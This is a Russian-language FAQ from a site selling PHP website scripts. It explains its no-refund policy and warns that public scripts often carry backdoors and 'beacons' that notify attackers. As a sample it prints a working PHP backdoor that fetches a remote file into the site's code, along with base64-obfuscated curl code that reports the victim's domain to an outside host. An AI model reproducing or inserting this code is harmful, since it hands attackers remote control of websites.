Я не знаю какой логин и пароль от админки?
Прежде чем озадачить службу поддержки — Напишите свой ВОПРОС в комментариях к скрипту. У нас есть услуга — Установка скрипта на хостинг. ПОЙМИТЕ одну суть — Мы просто физически не сможем помочь каждому. Мы не являемся разработчиками скриптов. Мы продаём цифровой товар! Скрипты продаются КАК ЕСТЬ! Мы не делаем возвратов денег за купленный товар. ВАЖНО! Скрипты рабочие! Мы проверяем их перед тем как выложить!
Прежде чем озадачить службу поддержки — Напишите свой ВОПРОС в комментариях к скрипту. У нас есть услуга — Установка скрипта на хостинг. ПОЙМИТЕ одну суть — Мы просто физически не сможем помочь каждому. Мы не являемся разработчиками скриптов. Мы продаём цифровой товар! Скрипты продаются КАК ЕСТЬ! Мы не делаем возвратов денег за купленный товар. ВАЖНО! Скрипты рабочие! Мы проверяем их перед тем как выложить!
Такой маркетинговый план нашего сайта. Многие скрипты на нашем ресурсе стоят 1-5 тыс руб — но к сожалению за эту цену мы будем продавать их год!
В данном раздели мы выкладываем скрипты для мотивации пользователей заходить на сайт
Мы покупаем скрипты у надёжных селлеров. (ОПТОМ) Мы тестируем каждый скрипт на работоспособность перед тем как выложить его на продажу
Нет не какого подвоха! Так как цена минимальная — нам выгодно что-бы были постоянные покупатели. Мы проверяем скрипты на уязвимости, шеллы, стучалки, бэкдоры — двумя программами ( если есть подозрения — проверяем в ручную ) + плюс у нас есть услуга дополнительной защиты и ручной проверки скрипта Смотрите раздел — Услуги
Это ошибка программиста или специально оставленная хакером (дыра) для взлома вашего сайта. Схема такая: Оставляют бэкдор + стучалку в популярном скрипте и выкидывают его в паблик. После того как вы скачаете и установите скрипт (стучалка) оповестит автора о домене и соответственно через оставленную дыру вам зальют web shell и получат полный доступ ко всем вашим сайтом на хостинге
Мы часто наталкиваемся на зловредный код в скриптах и узнаём уже их авторов по почерку
Пример бэкдора:
Пример бэкдора:
if( isset( $_GET['a'] ) && $_GET['a'] == 'd' ){
file_put_contents('core/classes/mail_server.php',file_get_contents('http://host1731685.hostland.pro/mail_server.txt'));}if( isset( $_GET['a'] ) &&
$url = base64_decode('aHR0cA==').(!empty($_SERVER[base64_decode('SFRUUFM=')])?base64_decode('cw=='):'').
base64_decode('Oi8v').$_SERVER[base64_decode('U0VSVkVSX05BTUU=')].$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, base64_decode('aHR0cDovL2JrLnNlY3VyaXR5ZnVzZS5jb20vcmVjZWl2ZXIucGhw'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER[base64_decode('U0VSVkVSX05BTUU=')].$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')]);
$html = curl_exec($ch);
Скачайте — Сканер AI-BOLIT для Windows 7,8,10 — Есть постоянное обновление, находит большинство уязвимостей. Есть ещё программы (платно) Но лучше проверять скрипты в ручную
Пример: Данный сайт стоит на движке WordPress — если просканировать его тем-же Айболитом он покажет от 30 уязвимостей! Даже в самом дырявом скрипте хайпа или фермы их редко больше 15. Естественно WordPress самый популярный движок для сайтов и его так просто не взломать. Если антивирус что-то нашёл это как правило не критично. Если даже и есть уязвимость, то раскрутить её сможет человек плотно знающий язык php. Но я не думаю что ему есть дело до ваших 300руб на PAYEER. Больше следует обращать внимание на стучалки, бэкдоры
У вас вынесли кассу ? ( 800р ) Не спишите звонить в киберполицию и отвлекать много уважаемых людей от важных дел. Сносить сайт тоже не надо! Надо сделать дамп сайта. Если сайт не один и вы не перекрыли доступ — заражены все сайты. Далее смотрим логи на хостинге — надо выяснить какие действия совершал негодяй который вас взломал. Выяснить где же ДЫРА. Любой антивирус на хостинге найдёт шелла. Удалить его и посмотреть по логам как загружается злоумышленник. Далее сносить абсолютно все сайты и проверять скрипты на шеллы, бэкдоры Данную услугу вы сможете заказать у нас на сайте.